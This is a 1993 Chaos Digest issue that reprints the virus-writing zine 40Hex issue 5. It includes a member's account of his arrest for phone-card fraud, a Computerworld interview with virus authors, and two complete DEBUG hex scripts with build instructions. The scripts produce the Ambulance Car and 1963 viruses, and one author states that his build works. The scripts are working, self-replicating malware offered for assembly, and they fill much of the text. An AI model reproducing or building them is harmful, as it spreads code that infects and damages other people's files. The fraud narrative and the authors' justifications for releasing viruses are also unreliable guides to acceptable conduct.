Chaos Digest Lundi 7 Juin 1993 Volume 1 : Numero 46 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.46 (7 Juin 1993) File 1--File 1--40H VMag Number 5 Volume 2 Issue 1 #000-004 (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #000-004 (reprint) 40Hex Number 5 Volume 2 Issue 1 File 000 Welcome to Issue 5 of 40Hex, the monthy semi-annual magazine published for all those interested in learning more about computer viruses. Lots of new news: 1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR had taken over the magazine. There has been so much new stuff, a lot got changed since the time I received this issue. Special BIG ASS greets to him for all of his work on this issue. 2) Digital Warfare is down, as Instigator got busted for phreaking. We will let you know more when we know more. Before its demise, its virus collection had grown incredibly, thus stocking 40Hex for life. 3) LandFill BBS went back up. I am back in the scene again. Give it a ring. 4) As of the release of this file, I have heard of more busts, specifically, Gengis Kahn and Rain Man.... could be rumor. BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches it as "Infinity"... probably due to the text it contains. Course, it was distributed on a VGA loader for the InFiniTy boards... heh heh heh... DecimatoR -)GHeap 40 Hex Mag Issue 5 File 000..............................You Are Here File 001..............................BUSTED! Instigator's Story File 002..............................Virus Spotlight: Ambulance Car File 003..............................The 1963 Virus File 004..............................Alliance w/McAfee and Dvorak File 005..............................Virus Author's Constitution File 006..............................The SKISM Vengeance Virus Hex File 007..............................Finding Scan Strings II Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude Instigator, Night Crawler, Crow Meister, Lazarus Long, Time Lord, Axiom Codex, and the rest of the Alliance crew. +++++ 40Hex Number 5 Volume 2 Issue 1 File 001 Instigator --- Busted! At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very entertaining Social Studies class and informed me he, 1 other local cop and 2 MCI phone fraud investigators were gonna serve a warrant on my house and confiscate my computer shit. So the cop takes me to my house and they start disassembling all of my computer stuff, and take all of my notes and shit. They filmed all this. They informed me I would be charged with theft of services, credit card fraud and a bunch of other shit, like 3 felonys and 5 misdimeanors till they were done. Anyways its about a week and a half after the incident now and they only formally charged me with theft of services. So the worst that is gonna happen is I will get 1 year of probation. The best thing is they are thinking of only giving me a citation or totally dropping the charges. I am suppose to get my system back after the DA comes to my house so I can show him how I did it. As for Digital Warfare I wanna give to someone to set up. Anyway I made it to the front page of 3 local newspapers so here is one of the articles: ----------------------------------------------------------------------------- (Shit inside the ***( )*** are my comments) From the front page of the Intelligencer Journal 2 "Hackers" caught stealing phone service Using sophisticated computers and telephones, two Lancaster County computer hackers touched MCI, a Washington-based telephone communications network, for approximately $4,700 last year. ***( Sophisticated phones? )*** Their activities represent "only the tip of the iceberg" of telecommunications fraud, which carries an annual $1 billion to $1.5 billion price tag, according to John Houser, a MCI spokesman. ***( Dick )*** The two are accused of accessing MCI's computer and obtaining "25 card numbers, thet we know about," Houser said. "We know they made calls all over the United Sates, to Canada, Great Britain, and West Germany" "None of the card numbers have been issued to Lancaster subscribers," Houser said. Columbia police are charging an 18 year old borough resident with credit card fraud, unlawful use of a computer, theft of services, and criminal conspiracy according to Sgt. C. Joseph Smith. Police are withholding his identity until he is formally charged, Smith said. West Donegal Township chief Charles R. Bronte said a fifteen year old suspect ***( that's me! )*** living in his jurisdiction was being refered to juvenile authorities by the department investigator, Cpl. Kenton Whitebread. Officers with both departments said this was an entirely new kind of criminal case for them. "I'm still going over our suspectes statement," said Smith, "and even when I'm done, I don't think I'm going to understand (all the technical jargon). We're getting a lot of help from MCI." "If our juvenile hadn't cooperated, it's possible we'd still be looking at his equipment", Bronte said. "He went into the computer, using his access codes," ***( He means I logged on my board )*** " to retrieve the information necessary to continue the investigation". Police confiscated computer telephone equipment, whose value is estimated ***( Estimated - Gimme a break!)*** in the thousands of dollars, when they executed search warrants at the residences of both suspects, Jan. 20. "It was a real United Nations collection," said Bronte, "There were a number of different manufacturers" of the equipment taken in West Donegal. ***( United Nations collection? )*** Most of the equipment taken in Columbia was made by Tandy, Smith said. Both posessed programs and equipment which allowed their computers to generate thousands of random numbers. Houser said that once an individual had knowledge of MCI's calling card format "they could access our computer switching equipment, and begin generating random numbers. ***( they make it sound so technical )*** They could allow their equipment to run 24 hours a day." Houser declined discussing the company security, but acknowledged "We became aware of an unusual number of calls coming into our computer line. We eventually were able to trace those calls back to the originating telephone equipment." ***( ANI )*** Bronte said MCI investigators arrived at his department early Monday afternoon. The warrant was executed at 2 pm, Bronte said. "We took investigators to the suspects home, while Cpl. Whitebread picked up the boy at his school. Smith said the Columbia warrant was served at 5:18pm on Monday. The suspect and another individual were working on his computer at the time. "They weren't doing anything illegal," he said. Smith said MCI first became aware of the two local hackers "about Dec. 14". They were monitoring them since." The officers said they did not believe either of the two profited from their activities. ***( Free Phone calls! )*** "I think it was just a case of him getting involved in someting that was entirely over his head, Bronte said. ***( Yeah, right )*** Houser said MCI's investigation was continuing. "We have reason to believe they shared some of their information with others," he said. "At this time I can tell you we have no other suspects in Pennsylvania, but that could change tomorrow." He said investigators were unsure at present if any of the computer data had been transmitted to other hackers. ***( They said one paragraph up that they thought we shared some of the information.. Duh )*** ----------------------------------------------------------------------------- Update -- ++++++ Here is the current casualties on the 476-9696 system, which is owned by TeleConnect, a subsidiary of MCI. Instigator ----- $1970.70 ----- Theft of Services(1 Count) Asphi ----- $2700.00 ----- Unlawful Use of Computer Credit Card Fraud Theft Of Services Criminal Conspiracy Dekion ----- UNKNOWN ----- UNKNOWN Count Zero ----- $83.63 ----- No Charges Just Billed (*) VenoM ----- $75.00 ----- No Charges Just Billed (*) Apparently the head of the operations is Terry Oakes. He is the phone Fraud investigator in charge of the TeleConnect Investigations. Give him a ring at 800-476-1234 Ext. 3045. Thank you. (*) In both cases parents were notified. -)GHeap +++++ 40Hex Number 5 Volume 2 Issue 1 File 002 Virus Spotlight: The Ambulance Car Virus Here's a debug script of the Ambulance Car virus. I've tested the virus created from this, and it works. Ambulance Car is a parasitic, non-resident .COM infector. It spreads rapidly, and has one of the neatest graphic displays that I've seen yet in a virus. When it activates, a little ambulance drives across the bottom of the screen, from left to right, and a siren is heard over the PC speaker. Other than that, all this thing does is replicate. To create the virus from the debug script, cut between the dotted lines and type: DEBUG < REDX.TXT > NUL ----------------------------------------------------------------------------- n redx.com e 0100 EB 37 90 48 65 6C 6C 6F 20 2D 20 43 6F 70 79 72 e 0110 69 67 68 74 20 53 20 26 20 53 20 45 6E 74 65 72 e 0120 70 72 69 73 65 73 2C 20 31 39 38 38 0A 0D 24 1A e 0130 B4 09 BA 03 01 CD 21 CD 20 E8 01 00 01 5E 81 EE e 0140 03 01 E8 1A 00 E8 17 00 E8 D2 01 8D 9C 19 04 BF e 0150 00 01 8A 07 88 05 8B 47 01 89 45 01 FF E7 C3 E8 e 0160 DE 00 8A 84 28 04 0A C0 74 F4 8D 9C 0F 04 FF 07 e 0170 8D 94 28 04 B8 02 3D CD 21 89 84 17 04 8B 9C 17 e 0180 04 B9 03 00 8D 94 14 04 B4 3F CD 21 8A 84 14 04 e 0190 3C E9 75 3F 8B 94 15 04 8B 9C 17 04 83 C2 03 33 e 01A0 C9 B8 00 42 CD 21 8B 9C 17 04 B9 06 00 8D 94 1C e 01B0 04 B4 3F CD 21 8B 84 1C 04 8B 9C 1E 04 8B 8C 20 e 01C0 04 3B 84 00 01 75 0C 3B 9C 02 01 75 06 3B 8C 04 e 01D0 01 74 64 8B 9C 17 04 33 C9 33 D2 B8 02 42 CD 21 e 01E0 2D 03 00 89 84 12 04 8B 9C 17 04 B8 00 57 CD 21 e 01F0 51 52 8B 9C 17 04 B9 19 03 8D 94 00 01 B4 40 CD e 0200 21 8B 9C 17 04 B9 03 00 8D 94 14 04 B4 40 CD 21 e 0210 8B 9C 17 04 33 C9 33 D2 B8 00 42 CD 21 8B 9C 17 e 0220 04 B9 03 00 8D 94 11 04 B4 40 CD 21 5A 59 8B 9C e 0230 17 04 B8 01 57 CD 21 8B 9C 17 04 B4 3E CD 21 C3 e 0240 A1 2C 00 8E C0 1E B8 40 00 8E D8 8B 2E 6C 00 1F e 0250 F7 C5 03 00 74 17 33 DB 26 8B 07 3D 50 41 75 08 e 0260 26 81 7F 02 54 48 74 0B 43 0B C0 75 EB 8D BC 28 e 0270 04 EB 32 83 C3 05 8D BC 28 04 26 8A 07 43 0A C0 e 0280 74 19 3C 3B 74 05 88 05 47 EB EF 26 80 3F 00 74 e 0290 0A D1 ED D1 ED F7 C5 03 00 75 DB 80 7D FF 5C 74 e 02A0 04 C6 05 5C 47 1E 07 89 BC 22 04 B8 2A 2E AB B8 e 02B0 43 4F AB B8 4D 00 AB 06 B4 2F CD 21 8C C0 89 84 e 02C0 24 04 89 9C 26 04 07 8D 94 78 04 B4 1A CD 21 8D e 02D0 94 28 04 33 C9 B4 4E CD 21 73 08 33 C0 89 84 28 e 02E0 04 EB 29 1E B8 40 00 8E D8 D1 CD 33 2E 6C 00 1F e 02F0 F7 C5 07 00 74 06 B4 4F CD 21 73 E7 8B BC 22 04 e 0300 8D 9C 96 04 8A 07 43 AA 0A C0 75 F8 8B 9C 26 04 e 0310 8B 84 24 04 1E 8E D8 B4 1A CD 21 1F C3 06 8B 84 e 0320 0F 04 25 07 00 3D 06 00 75 15 B8 40 00 8E C0 26 e 0330 A1 0C 00 0B C0 75 08 26 FF 06 0C 00 E8 02 00 07 e 0340 C3 1E BF 00 B8 B8 40 00 8E D8 A0 49 00 3C 07 75 e 0350 03 BF 00 B0 8E C7 1F BD F0 FF BA 00 00 B9 10 00 e 0360 E8 3F 00 42 E2 FA E8 16 00 E8 7B 00 45 83 FD 50 e 0370 75 E8 E8 03 00 1E 07 C3 E4 61 24 FC E6 61 C3 BA e 0380 D0 07 F7 C5 04 00 74 03 BA B8 0B E4 61 A8 03 75 e 0390 08 0C 03 E6 61 B0 B6 E6 43 8B C2 E6 42 8A C4 E6 e 03A0 42 C3 51 52 8D 9C BF 03 03 DA 03 D5 0B D2 78 34 e 03B0 83 FA 50 73 2F BF 80 0C 03 FA 03 FA 2B D5 B9 05 e 03C0 00 B4 07 8A 07 2C 07 02 C1 2A C2 83 F9 05 75 0A e 03D0 B4 0F F7 C5 03 00 74 02 B0 20 AB 83 C3 10 81 C7 e 03E0 9E 00 E2 DD 5A 59 C3 1E B8 40 00 8E D8 A1 6C 00 e 03F0 3B 06 6C 00 74 FA 1F C3 22 23 24 25 26 27 28 29 e 0400 66 87 3B 2D 2E 2F 30 31 23 E0 E1 E2 E3 E4 E5 E6 e 0410 E7 E7 E9 EA EB 30 31 32 24 E0 E1 E2 E3 E8 2A EA e 0420 E7 E8 E9 2F 30 6D 32 33 25 E1 E2 E3 E4 E5 E7 E7 e 0430 E8 E9 EA EB EC ED EE EF 26 E6 E7 29 59 5A 2C EC e 0440 ED EE EF F0 32 62 34 F4 09 00 E9 36 00 EB 2E 90 e 0450 05 00 EB 2E 90 rcx 0355 w q ---------------------------------------------------------------------------- DA +++++ 40Hex Number 5 Volume 2 Issue 1 File 003 The 1963 Virus Here's a debug script of 1963. It's classified as an overwriting virus, but it attaches the code it overwrites onto the end of the file it infects... so it overwrites, but it doesn't. Sort of. ---------------------------------------------------------------------------- n 1963.com e 0100 B4 30 CD 21 3C 03 72 07 B8 00 12 CD 2F 3C FF B8 e 0110 0B 00 72 71 B4 4A BB 40 01 CD 21 72 68 FA 0E 17 e 0120 BC FE 13 E8 C5 00 FB A1 2C 00 0B C0 74 61 E8 BB e 0130 06 8E C0 33 FF 33 C0 AF 75 FD AF 8B D7 06 1F B4 e 0140 48 BB FF FF CD 21 B4 48 CD 21 8E C0 B4 49 CD 21 e 0150 33 C0 8B CB 8C C3 51 B9 08 00 33 FF F3 AB 43 8E e 0160 C3 59 E2 F2 0E 07 BB 04 09 8B FB AB B0 80 AB 8C e 0170 C8 AB B8 5C 00 AB 8C C8 AB B8 6C 00 AB 8C C8 AB e 0180 B8 00 4B CD 21 0E 1F E8 62 06 2E FF 2E 0A 00 B8 e 0190 20 12 BB 05 00 CD 2F 53 4B 4B 26 88 1D B8 16 12 e 01A0 CD 2F 4B 4B 26 89 1D B4 48 BB FF FF CD 21 B4 48 e 01B0 CD 21 8E D8 5B B8 00 42 33 C9 33 D2 CD 21 B4 3F e 01C0 BA 00 01 26 8B 4D 11 CD 21 72 BA B4 3E CD 21 B4 e 01D0 26 8C DA CD 21 4A 8E C2 26 8C 1E 01 00 42 8E C2 e 01E0 8E D2 BC FE FF 1E B8 00 01 50 CB 1E B8 03 12 CD e 01F0 2F 2E 8C 1E 04 09 33 F6 8E DE BF 88 02 8C CE 87 e 0200 3E 04 00 87 36 06 00 9C 9C 9C 8B EC 80 4E 01 01 e 0210 9D 9C 9C 2E C7 06 06 09 AF 08 B4 01 FF 1E 4C 00 e 0220 9D 2E C7 06 06 09 AB 08 B4 0B FF 1E 84 00 9D 89 e 0230 3E 04 00 89 36 06 00 1F 1E 06 8C CB BD AE 02 A1 e 0240 AB 08 8B 16 AD 08 33 F6 8E DE 3B 06 84 00 75 10 e 0250 3B 16 86 00 75 0A 89 2E 84 00 89 1E 86 00 EB 25 e 0260 B8 AB 08 8E C3 B9 10 00 FC 8B F8 8E DA A7 75 0B e 0270 A7 75 06 89 6C FC 89 5C FE 4E 4E 4E E2 EB 87 F1 e 0280 42 3B D3 75 E4 07 1F C3 55 8B EC 50 8B 46 04 2E e 0290 3B 06 04 09 77 15 53 2E 8B 1E 06 09 2E 89 47 02 e 02A0 8B 46 02 2E 89 07 80 66 07 FE 5B 58 5D CF 55 8B e 02B0 EC 80 FC 48 74 0A 80 FC 4A 74 05 3D 03 4B 75 0C e 02C0 E8 89 05 E8 AF 05 9C E8 87 05 EB 55 80 FC 31 74 e 02D0 05 80 FC 4C 75 0D 53 BB 13 00 E8 55 02 4B 79 FA e 02E0 5B EB 5F 80 FC 0F 74 0F 80 FC 10 74 0A 80 FC 17 e 02F0 74 05 80 FC 23 75 05 E8 25 05 EB 46 80 FC 3F 75 e 0300 25 E8 2E 02 73 06 B8 05 00 E9 F7 00 75 34 E8 64 e 0310 05 72 F6 9C E8 6D 05 1E 07 8B FA E8 67 04 E8 75 e 0320 05 9D 5D CA 02 00 80 FC 3D 74 0A 80 FC 43 74 05 e 0330 80 FC 56 75 05 E8 E1 01 EB 08 80 FC 3E 75 0E E8 e 0340 F0 01 FF 76 06 9D 5D FA 2E FF 2E AB 08 80 FC 14 e 0350 74 0D 80 FC 21 74 08 80 FC 27 74 03 E9 7F 00 E8 e 0360 BD 04 73 04 5D B0 01 CF 75 D8 E8 17 05 E8 A4 04 e 0370 80 FC 14 75 14 8B 44 0C BA 80 00 F7 E2 33 DB 02 e 0380 44 20 12 E3 13 DA 93 EB 06 8B 44 23 8B 5C 21 8B e 0390 4C 0E F7 E1 73 05 E8 FD 04 EB C9 93 F7 E1 03 D3 e 03A0 72 F4 2E A3 D0 08 2E 89 16 D2 08 2E 89 0E D4 08 e 03B0 E8 E3 04 E8 BF 04 0A C0 74 04 3C 03 75 1E E8 C3 e 03C0 04 80 FC 27 2E A1 D4 08 75 04 F7 E1 72 C8 50 B4 e 03D0 2F CD 21 8B FB 58 E8 AC 03 E8 BA 04 5D CF 3D 00 e 03E0 4B 74 2A 3D 01 4B 74 03 E9 57 FF E8 41 00 72 13 e 03F0 56 57 1E 0E 1F BE E2 08 8D 7F 0E FC A5 A5 A5 A5 e 0400 1F 5F 5E 9C D0 6E 06 9D D0 56 06 5D CF E8 1F 00 e 0410 72 F1 50 B4 51 CD 21 8E DB 8E C3 58 FA 2E 8B 26 e 0420 E2 08 2E 8E 16 E4 08 44 44 FB 2E FF 2E E6 08 E8 e 0430 52 04 F9 E8 E4 00 B8 0B 00 72 32 FC 9C 1E B8 22 e 0440 35 CD 21 2E 89 1E B7 08 2E 8C 06 B9 08 C5 76 0A e 0450 0E 07 BF D4 08 8B DF B9 07 00 F3 A5 1F E8 EC 03 e 0460 52 B8 01 4B E8 12 04 5A E8 E6 03 73 07 89 46 08 e 0470 E8 23 04 C3 89 46 08 B4 51 CD 21 8E C3 8B 76 00 e 0480 36 C5 54 02 26 89 16 0A 00 26 8C 1E 0C 00 B8 22 e 0490 25 CD 21 9D 75 DA 0E 1F BE 04 09 BF 00 01 B9 AB e 04A0 07 F3 A4 E8 B2 02 74 03 F8 EB C5 8B FB 83 C7 10 e 04B0 A1 B1 10 A3 E6 08 A1 B3 10 03 C7 A3 E8 08 8B 0E e 04C0 AF 10 0B C9 74 E2 C5 56 0E E8 96 03 72 35 8B D8 e 04D0 51 0E 1F 33 C9 8B 16 02 09 E8 8F 03 BA 04 09 59 e 04E0 51 B9 04 00 E8 7D 02 59 72 16 8B F2 1E 8B 44 02 e 04F0 8B 34 03 C7 8E D8 01 3C 1F E2 E5 E8 69 03 EB A8 e 0500 E8 64 03 06 1F 2E C4 1E B7 08 89 1E 0A 00 8C 06 e 0510 0E 00 E8 D7 02 F9 E9 1D FF F8 50 53 9C E8 42 03 e 0520 72 0C 8B D8 9D 9C E8 0A 00 9C E8 3A 03 9D 5B 5B e 0530 58 C3 F8 FC E8 4D 03 9C 53 B8 20 12 CD 2F 72 0C e 0540 32 FF 26 8A 1D B8 16 12 CD 2F 73 04 E8 47 03 C3 e 0550 06 0E 1F B8 23 35 CD 21 89 1E BB 08 8C 06 BD 08 e 0560 40 CD 21 89 1E BF 08 8C 06 C1 08 B4 25 BA 81 08 e 0570 CD 21 48 42 42 CD 21 07 5B B0 02 26 86 45 02 A2 e 0580 C9 08 26 8B 45 05 A3 CA 08 26 8B 45 15 A3 D0 08 e 0590 26 8B 45 17 A3 D2 08 26 8B 45 11 26 8B 55 13 A3 e 05A0 CC 08 89 16 CE 08 3D 1A 00 83 DA 00 72 55 9D 72 e 05B0 16 26 8B 45 28 3D 45 58 74 07 3D 43 4F 75 44 B0 e 05C0 4D 26 3A 45 2A 75 3C 33 C9 33 D2 E8 9D 02 BA EA e 05D0 08 B1 1A E8 8E 01 72 3D 33 C9 33 D2 E8 79 01 75 e 05E0 0B A1 F2 08 B2 10 F7 E2 8B CA 8B D0 51 52 81 C2 e 05F0 AB 07 83 D1 00 3B 0E CE 08 75 04 3B 16 CC 08 5A e 0600 59 76 02 EB 58 51 52 E8 61 02 BA 04 09 B9 AB 07 e 0610 E8 51 01 73 02 EB 3F 06 57 0E 07 BE EF 09 BF EB e 0620 01 B9 C3 00 F3 A6 5F 07 75 5F 8B D1 E8 41 02 B9 e 0630 AD 07 BA 04 09 E8 20 01 75 03 83 C1 06 26 01 4D e 0640 11 26 83 55 13 00 E8 1B 01 72 0B 8B F2 49 49 E8 e 0650 26 01 3B 14 74 03 F9 EB 08 3A C0 EB 04 B0 01 3C e 0660 00 9C BE C9 08 FC 47 47 A4 47 47 A5 83 C7 0A A5 e 0670 A5 A5 A5 B8 24 25 C5 16 BF 08 CD 21 48 2E C5 16 e 0680 BB 08 CD 21 9D E8 0E 02 C3 26 F6 45 04 04 75 CD e 0690 B4 0D CD 21 53 1E 06 B8 40 35 CD 21 89 1E C3 08 e 06A0 8C 06 C5 08 B0 13 CD 21 89 1E B3 08 8C 06 B5 08 e 06B0 B4 25 C5 16 AF 08 CD 21 B0 40 BA 59 EC BB 00 F0 e 06C0 8E DB CD 21 07 1F 5B 33 C9 33 D2 E8 A2 01 B9 AB e 06D0 07 BE 04 09 E8 81 00 75 15 83 C1 06 A1 F0 08 A3 e 06E0 AF 10 A1 FE 08 A3 B1 10 A1 00 09 A3 B3 10 56 E8 e 06F0 86 00 89 14 5A 41 41 E8 74 00 72 39 5A 59 E8 6A e 0700 01 BA 00 01 B9 AB 07 E8 64 00 72 2F E8 49 00 75 e 0710 20 33 C9 89 0E F0 08 89 16 FE 08 C7 06 00 09 F0 e 0720 FF 33 D2 E8 45 01 BA EA 08 B9 1A 00 E8 3F 00 72 e 0730 0A 3A C0 EB 07 B0 01 3C 00 EB 01 F9 9C B4 0D CD e 0740 21 1E B8 13 25 C5 16 B3 08 CD 21 B0 40 2E C5 16 e 0750 C3 08 CD 21 1F E9 0A FF A1 EA 08 3D 4D 5A 74 03 e 0760 3D 5A 4D C3 B4 3F E8 10 01 72 02 3B C1 C3 B4 40 e 0770 E8 06 01 72 02 3B C1 C3 51 33 D2 AC 02 D0 80 D6 e 0780 00 E2 F8 59 C3 0E 1F BE 04 09 8B D8 B9 AB 07 E8 e 0790 C6 FF 75 27 A1 F2 08 BA 10 00 F7 E2 53 57 E8 1E e 07A0 00 5F 5B BE EA 08 B9 1A 00 A1 AF 10 A3 F0 08 A1 e 07B0 B1 10 A3 FE 08 A1 B3 10 A3 00 09 33 C0 33 D2 2B e 07C0 06 D0 08 1B 16 D2 08 72 0A 75 20 2B D8 76 1C 03 e 07D0 F8 EB 0F F7 D8 83 D2 00 F7 DA 75 0F 2B C8 76 0B e 07E0 03 F0 3B CB 76 02 8B CB FC F3 A4 C3 9C E8 94 00 e 07F0 B4 49 1E 07 CD 21 B4 49 8E 06 2C 00 CD 21 B4 50 e 0800 8B 1E 16 00 CD 21 B8 22 25 C5 16 0A 00 CD 21 E8 e 0810 84 00 9D C3 8B F2 80 3C FF 75 03 83 C6 07 C3 E8 e 0820 62 00 E8 EF FF 0E 07 BA 04 09 8B FA FC AC 0A C0 e 0830 74 05 04 40 B4 3A AB A5 A5 A5 A5 B0 2E AA A5 A4 e 0840 32 C0 AA 06 1F E8 D1 FC E8 4B 00 C3 50 8C C8 EB e 0850 03 50 33 C0 53 1E 8C CB 4B 8E DB A3 01 00 1F 5B e 0860 58 C3 B8 00 3D EB 12 B4 3E EB 0E B8 00 42 EB 09 e 0870 B8 02 42 EB 04 FF 76 06 9D 9C FA 2E FF 1E AB 08 e 0880 C3 B0 03 CF 2E 8F 06 C7 08 1E 52 06 53 50 51 56 e 0890 57 55 8B EC EB 10 2E 8F 06 C7 08 8B E5 5D 5F 5E e 08A0 59 58 5B 07 5A 1F 2E FF 26 C7 08 00 00 00 00 00 e 08B0 00 00 00 00 00 44 83 00 00 44 83 00 00 44 83 00 e 08C0 00 44 83 00 00 44 83 00 00 00 00 00 00 00 00 00 e 08D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 rcx 0800 w q +++++ 40Hex Number 5 Volume 2 Issue 1 File 004 Forty Hex 5 Presents An Alliance Interview with John McAfee + Jon Dvorak and Hellraiser, Garbageheap, DecimatoR, Count Zero, CRoW MeiSTeR, Instigator, Demogorgon, Dark Angel, Night Crawler, VenoM, Time Lord, Darkman. On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM, NuKE, and Ex-RABiD. We started the conference by trying to call Patti Hoffman, who had a shit fit, and denied being the author of VSUM. Nice of her to insult our intelligence. But anyways, we then called McAfee, who was surprisingly a nice guy. He was interested in what we had to say. Some of the topics covered were which viruses we had written, what types of viri they were(i.e. MemRes, Stealth...). Another important topic covered the Bob Ross Virus which an associate of McAfee had misnamed the Beta Virus(it was first spread on a false version of BNU(1.90Beta)). On the following day, we started a second alliance, this time involving Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap(moi!), Hellraiser, Instigator, Night Crawler and Time Lord. Also in the conference were John Markoff(New York Times), Michael Alexander(Computer World), and John McAfee. A variety of topics were covered, I won't go into specifics here, because in a future issue we will have a full transcript, and in this issue we will have the article from the Feb. 10,1992 Vol.XXVI No. 6 issue of COMPUTERWORLD. --------------------------------------------------------------------------- CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*) By: Michael Alexander/CW STAFF What motivates a programmer to write a virus? The thrill, declared Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus author and a member of Phalcon/Skism, a group of about a dozen computer hackers scattered across North America. In an unusual telephone conference call to COMPUTERWORLD last week, 10 callers who said they were members of Phalcon/Skism claimed to be responsible for writing several of the viruses now on the loose.(* CLAIMED?!?!?!! Well, I suppose that he couldnt know if we were the real McCoy *) To protect their identities, the callers used such handles as Garbage Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and Time Lord. They said their ages range from 15 to 23 years old, although COMPUTERWORLD could not independantly verify their identities. GETTING ATTENTION +++++++++++++++++ The virus authors, as they called themselves, said they arranged the teleconference to air their side of the story, and to talk about their unorthadox and contradictory brand of computer ethics. (* Well... close, we were real bored... of course, who wants to talk to bored virus authors... *) "For the most part, virus authors are seen as a lot more malicious than we actually are," Garbage Heap said. His compatriots said they write viruses mainly for the thrill but also for the challenge and the status it brings within the computer underground. The group said it is not interested in doing harm, and seldom creates viruses that are deliberately designed to cause damage. "It's sort of like graffiti - getting our name across - and damage happens in the process," he claimed.(* Hellraiser *) As an example of the type of virus they write, the group took credit for writing the Bob Ross Virus, named after the painter of the same name on who hosts a show on Public Broadcasting Service. "What it does is infect files and randomly displays 'Bobisms,' which are messages Bob Ross would say," Hell Raiser said. "It doesn't format the hard drive or do any damage." However, other alleged members of Phalcon/Skism later admitted to writing viruses that are clearly intended to damage or destroy programs and data.(* Hellraiser again... *) The callers contended that they are virus "authors," not virus "spreaders," and that they are not responsible for the problems their creations cause. "The main difference is that an author may write a virus and may even upload that virus to a virus board, a [bulletin Board system] oriented to virus programmers and spreaders," one virus author explained. "People, like a disgruntled employee who may have a gripe with someone else, download it and spread it that way," this virus author said. NOT LAWBREAKERS +++++++++++++++ The virus authors also pointed out that since the act of writing a virus is not prohibited by law, they should not be viewed as criminals. The callers claimed that even if the group stopped writing viruses, the number of infections would not decline. The problem of viruses has grown so large that new viruses have no impact overall, one said. "Our effect is fairly little," he asserted. The callers said that they have been writing viruses for about a year, and would probably continue for at least another year. Eventually, they hope to find jobs as full time programmers, several said. There is no way to verify the callers' claims. However, many of the monikers the callers used, as well as the name "Phalcon/Skism," have shown up in perhaps as many as half - about 100 - of the viruses to appear in the past six or seven months, said John McAfee, president of McAfee Associates, an antivirus software publisher based in Santa Clara,Calif. The quality of the viruses is "mediocre," Mcafee said. (* Cant win 'em all can we, John? *) --------------------------------------------------------------------------- My thoughts on the article was that it was neutral, Mr. Alexander could have easily ripped us apart. We didnt expect to come out looking like heros, so why should we bitch. Next month prepare for the official transcript of the interview. Then we can truly establish what was said. -)GHeap ------------------------------ End of Chaos Digest #1.46 ************************************ Downloaded From P-80 International Information Systems 304-744-2253